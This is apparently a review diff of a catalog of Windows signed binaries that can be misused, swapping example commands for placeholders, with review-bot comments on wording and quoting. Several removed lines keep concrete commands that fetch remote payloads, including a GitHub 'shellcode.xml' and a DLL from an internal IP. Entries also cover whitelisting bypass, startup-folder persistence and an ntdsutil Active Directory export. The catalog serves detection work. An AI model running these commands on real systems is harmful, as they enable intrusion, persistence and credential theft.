Commands:
- Command: mspub.exe https://example.com/payload
- Command: mspub.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

View File

@@ -1,10 +1,10 @@
---
Name: msxsl.exe
Description: Command line utility used to perform XSL transformations.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msxsl.exe customers.xml script.xsl
- Command: msxsl.exe {PATH:.xml} {PATH:.xsl}
Description: Run COM Scriptlet code within the script.xsl file (local).
Usecase: Local execution of script stored in XSL file.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: XSL
- Command: msxsl.exe customers.xml script.xsl
- Command: msxsl.exe {PATH:.xml} {PATH:.xsl}
Description: Run COM Scriptlet code within the script.xsl file (local).
Usecase: Local execution of script stored in XSL file.
Category: AWL Bypass
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: XSL
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
- Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
Category: Execute
@@ -32,7 +32,7 @@ Commands:
Tags:
- Execute: XSL
- Execute: Remote
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
- Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
Category: AWL Bypass
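Review bot: this hunk generalises the same original command as the previous hunk but differently: here the two arguments become `{REMOTEURL:.xml} {REMOTEURL:.xml}`, whereas the Execute variant above became `{REMOTEURL:.xml} {REMOTEURL:.xsl}`. The original passed the same shellcode.xml URL twice and the Description says `shellcode.xml(xsl)`, so `.xml .xml` is arguably the faithful form; either way the two entries should match.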
@@ -42,14 +42,14 @@ Commands:
Tags:
- Execute: XSL
- Execute: Remote
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>
- Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}
Description: Using remote XML and XSL files, save the transformed XML file to disk.
Usecase: Download a file from the internet and save it to disk.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>:ads-name
- Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name
Description: Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).
Usecase: Download a file from the internet and save it to an NTFS Alternate Data Stream.
Category: ADS

View File

@@ -1,7 +1,7 @@
---
Name: ntdsutil.exe
Description: Command line utility used to export Active Directory.
Author: 'Tony Lambert'
Author: Tony Lambert
Created: 2020-01-10
Commands:
- Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
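Review bot: only the Author quoting changes in this hunk, leaving the context line `ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q` with a literal `c:\` output location; since the commit generalises output folders elsewhere (adplus uses `{PATH_ABSOLUTE:folder}`), consider `"create full {PATH_ABSOLUTE:folder}"` here too, or note why the root path is kept.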
@@ -13,8 +13,6 @@ Commands:
OperatingSystem: Windows
Full_Path:
- Path: C:\Windows\System32\ntdsutil.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml

View File

@@ -4,8 +4,8 @@ Description: Console Window host for Windows Terminal
Author: Nasreddine Bencherchali
Created: 2022-06-17
Commands:
- Command: "OpenConsole.exe calc"
Description: Execute calc with OpenConsole.exe as parent process
- Command: OpenConsole.exe {PATH:.exe}
Description: Execute specified process with OpenConsole.exe as parent process
Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User

View File

@@ -4,7 +4,7 @@ Description: Microsoft Office binary.
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
- Command: Powerpnt.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

@@ -6,8 +6,8 @@ Aliases:
Author: 'Alfie Champion (@ajpc500)'
Created: 2020-10-14
Commands:
- Command: procdump.exe -md calc.dll explorer.exe
Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
- Command: procdump.exe -md {PATH:.dll} explorer.exe
Description: Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User
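Review bot: "Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function" reads awkwardly after the substitution; suggest "Loads the specified DLL, which must export a 'MiniDumpCallbackRoutine' function." The second command in this file has the same construction and could be reworded the same way.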
@@ -15,8 +15,8 @@ Commands:
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
- Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
- Command: procdump.exe -md {PATH:.dll} foobar
Description: Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User

@@ -4,7 +4,7 @@ Description: Microsoft Office binary
Author: Nir Chako
Created: 2022-07-24
Commands:
- Command: ProtocolHandler.exe https://example.com/payload
- Command: ProtocolHandler.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)"
Category: Download

@@ -1,10 +1,10 @@
---
Name: rcsi.exe
Description: Non-Interactive command line inerface included with Visual Studio.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rcsi.exe bypass.csx
- Command: rcsi.exe {PATH:.csx}
Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: Execute
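Review bot: while this file is being touched, fix "inerface" to "interface" in the Description context line; it sits outside the changed lines but will otherwise survive the cleanup.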
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: CSharp
- Command: rcsi.exe bypass.csx
- Command: rcsi.exe {PATH:.csx}
Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: AWL Bypass
@@ -24,8 +24,6 @@ Commands:
- Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

@@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-06-01
Commands:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
- Command: Remote.exe /s {PATH:.exe} anythinghere
Description: Spawns specified executable as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: AWL Bypass
Privileges: User
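Review bot: the original `/s "powershell.exe"` kept the executable argument quoted, but the new `/s {PATH:.exe}` drops the quotes, so a substituted path containing spaces (typical under Program Files) would be split by remote.exe. Suggest `/s "{PATH:.exe}"` here and in the second command, and `/s "{PATH_SMB:.exe}"` for the UNC variant further down this file.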
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
- Command: Remote.exe /s {PATH:.exe} anythinghere
Description: Spawns specified executable as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
- Command: Remote.exe /s {PATH_SMB:.exe} anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
Category: Execute
@@ -35,8 +35,6 @@ Commands:
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Code_Sample:
- Code:
Detection:
- IOC: remote.exe process spawns
- Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml

@@ -1,7 +1,7 @@
---
Name: Sqldumper.exe
Description: Debugging utility included with Microsoft SQL.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: sqldumper.exe 464 0 0x0110
@@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml

@@ -1,7 +1,7 @@
---
Name: Sqlps.exe
Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Sqlps.exe -noprofile
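Review bot: the Description context line carries "compatability"; since the file is already in this changeset, correct it to "compatibility".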
@@ -19,8 +19,6 @@ Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
- Path: C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml

@@ -1,10 +1,10 @@
---
Name: SQLToolsPS.exe
Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
- Command: SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe}
Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.
Usecase: Execute PowerShell command.
Category: Execute
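Review bot: the Description context line reads "loads SQL Server cmdlts"; correct it to "cmdlets" while the file is being edited.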
@@ -15,8 +15,6 @@ Commands:
- Execute: PowerShell
Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml
- Splunk: https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md
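Review bot: the Full_Path context line for this SQLToolsPS.exe entry points at `...\130\Tools\Binn\sqlps.exe`, i.e. the other binary; it should list SQLToolsPS.exe (or "no default" if the install location is unknown) so the Full_Path matches the Name field.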

@@ -4,14 +4,14 @@ Description: Binary to update the existing installed Nuget/squirrel package. Par
Author: 'Reegun J (OCBC Bank) - @reegun21'
Created: 2019-06-26
Commands:
- Command: squirrel.exe --download [url to package]
- Command: squirrel.exe --download {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: squirrel.exe --update [url to package]
- Command: squirrel.exe --update {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -21,7 +21,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --update [url to package]
- Command: squirrel.exe --update {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -31,7 +31,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
- Command: squirrel.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -41,7 +41,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
- Command: squirrel.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute

@@ -4,7 +4,7 @@ Description: Testing tool included with Microsoft Test Authoring and Execution F
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: te.exe bypass.wsc
- Command: te.exe {PATH:.wsc}
Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
Usecase: Execute Visual Basic script stored in local Windows Script Component file.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: te.exe test.dll
- Command: te.exe {PATH:.dll}
Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.
Usecase: Execute DLL file.
Category: Execute

@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Node.JS
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
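Review bot: the Description still says "Teams spawns cmd.exe as a child process of teams.exe and executes the ping command", but the generalised command now contains only `{CMD} &&`, so the cmd.exe and ping references no longer match the example; reword to something like "Teams spawns the specified command as a child process of teams.exe".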

@@ -1,10 +1,10 @@
---
Name: Tracker.exe
Description: Tool included with Microsoft .Net Framework.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
- Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
- Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process.
Category: AWL Bypass
@@ -24,8 +24,6 @@ Commands:
- Execute: DLL
Full_Path:
- Path: no default
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml
Resources:

@@ -1,17 +1,17 @@
---
Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2019-06-26
Commands:
- Command: Update.exe --download [url to package]
- Command: Update.exe --download {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --update=[url to package]
- Command: Update.exe --update={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -21,7 +21,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=[url to package]
- Command: Update.exe --update={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -31,7 +31,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
- Command: Update.exe --update={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -41,7 +41,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --update=\\remoteserver\payloadFolder
- Command: Update.exe --update={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: Execute
@@ -51,7 +51,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
- Command: Update.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -61,7 +61,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=[url to package]
- Command: Update.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -71,7 +71,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
- Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
Category: AWL Bypass
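Review bot: `--processStart {PATH:.exe}` suggests an arbitrary path, but the Description states the file must first be copied into `%userprofile%\AppData\Local\Microsoft\Teams\current\`; consider a placeholder that conveys a bare file name within that directory, or make the Description say explicitly that the argument is the file name inside the Teams directory. The same applies to the second --processStart command and the --createShortcut command in this file.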
@@ -81,7 +81,7 @@ Commands:
Tags:
- Execute: CMD
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
- Command: Update.exe --updateRollback={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -91,7 +91,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
- Command: Update.exe --updateRollback={PATH_SMB:folder}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase: Download and execute binary
Category: Execute
@@ -101,7 +101,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
- Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
Category: Execute
@@ -110,8 +110,8 @@ Commands:
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: CMD
- Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
- Command: Update.exe --createShortcut={PATH:.exe} -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary
Category: Execute
Privileges: User
@@ -119,7 +119,7 @@ Commands:
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: EXE
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
- Command: Update.exe --removeShortcut={PATH:.exe}-l=Startup
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase: Execute binary
Category: Execute
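Review bot: the substitution lost the space before `-l=Startup`: the new line reads `--removeShortcut={PATH:.exe}-l=Startup`, whereas the original was `--removeShortcut=payload.exe -l=Startup`. Restore the space, otherwise the rendered command is wrong.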

@@ -4,7 +4,7 @@ Description: Command-line tool used for performing diagnostics.
Author: Bobby Cooke
Created: 2023-07-12
Commands:
- Command: VSDiagnostics.exe start 1 /launch:calc.exe
- Command: VSDiagnostics.exe start 1 /launch:{PATH:.exe}
Description: Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable.
Usecase: Proxy execution of binary
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe"
- Command: VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:"{CMD:args}"
Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.
Usecase: Proxy execution of binary with arguments
Category: Execute

@@ -1,10 +1,10 @@
---
Name: VSIISExeLauncher.exe
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: 'timwhite'
Author: timwhite
Created: 2021-09-24
Commands:
- Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
- Command: VSIISExeLauncher.exe -p {PATH:.exe} -a "{CMD:args}"
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
Category: Execute
@@ -15,8 +15,6 @@ Commands:
- Execute: EXE
Full_Path:
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
- IOC: VSIISExeLauncher.exe spawned an unknown process
@@ -24,4 +22,3 @@ Resources:
- Link: https://github.com/timwhitez
Acknowledgement:
- Person: timwhite
Handle:

@@ -4,7 +4,7 @@ Description: Microsoft Visio Executable
Author: Avihay Eldad
Created: 2024-02-15
Commands:
- Command: Visio.exe https://example.com/payload
- Command: Visio.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

@@ -17,8 +17,6 @@ Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\x64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\<version>\UIAVerify\VisualUiaVerifyNative.exe
Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml

@@ -4,7 +4,7 @@ Description: Microsoft Visual Studio browser launcher tool for web applications
Author: Avihay Eldad
Created: 2024-04-12
Commands:
- Command: VSLaunchBrowser.exe .exe http://example.com/payload
- Command: VSLaunchBrowser.exe .exe {REMOTEURL:.exe}
Description: Download and execute payload from remote server
Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Download
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Download: INetCache
- Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
- Command: VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}
Description: Execute payload via VSLaunchBrowser as parent process
Usecase: It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Execute
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: VSLaunchBrowser.exe .exe \\Server\Path\file
- Command: VSLaunchBrowser.exe .exe {PATH_SMB}
Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Execute
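Review bot: the Description says "Execute payload from WebDAV server" while the placeholder chosen is `{PATH_SMB}`; either the description should say a UNC/SMB path, or, if WebDAV is the intended transport, the placeholder name should reflect that so readers do not assume SMB.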

@@ -4,8 +4,8 @@ Description: VShadow is a command-line tool that can be used to create and manag
Author: Ayberk Halaç
Created: 2023-09-06
Commands:
- Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:'
Description: Executes calc.exe from vshadow.exe.
- Command: 'vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:'
Description: Executes specified executable from vshadow.exe.
Usecase: Performs execution of specified executable file.
Category: Execute
Privileges: Administrator

@@ -1,11 +1,11 @@
---
Name: vsjitdebugger.exe
Description: Just-In-Time (JIT) debugger included with Visual Studio
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Vsjitdebugger.exe calc.exe
Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
- Command: Vsjitdebugger.exe {PATH:.exe}
Description: Executes specified executable as a subprocess of Vsjitdebugger.exe.
Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe.
Category: Execute
Privileges: User
@@ -15,8 +15,6 @@ Commands:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\vsjitdebugger.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml
Resources:

@@ -4,7 +4,7 @@ Description: The Workflow Command-line Compiler tool is included with the Window
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: wfc.exe c:\path\to\test.xoml
- Command: wfc.exe {PATH_ABSOLUTE:.xoml}
Description: Execute arbitrary C# code embedded in a XOML file.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass

@@ -4,7 +4,7 @@ Description: Microsoft Project Executable
Author: Avihay Eldad
Created: 2024-02-14
Commands:
- Command: WinProj.exe https://example.com/payload
- Command: WinProj.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

@@ -4,7 +4,7 @@ Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
- Command: winword.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

@@ -1,7 +1,7 @@
---
Name: Wsl.exe
Description: Windows subsystem for Linux executable
Author: 'Matthew Brown'
Author: Matthew Brown
Created: 2019-06-27
Commands:
- Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags:
- Execute: CMD
- Command: wsl.exe --exec bash -c "<command>"
- Command: wsl.exe --exec bash -c "{CMD}"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands.
Category: Execute
@@ -40,8 +40,6 @@ Commands:
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Full_Path:
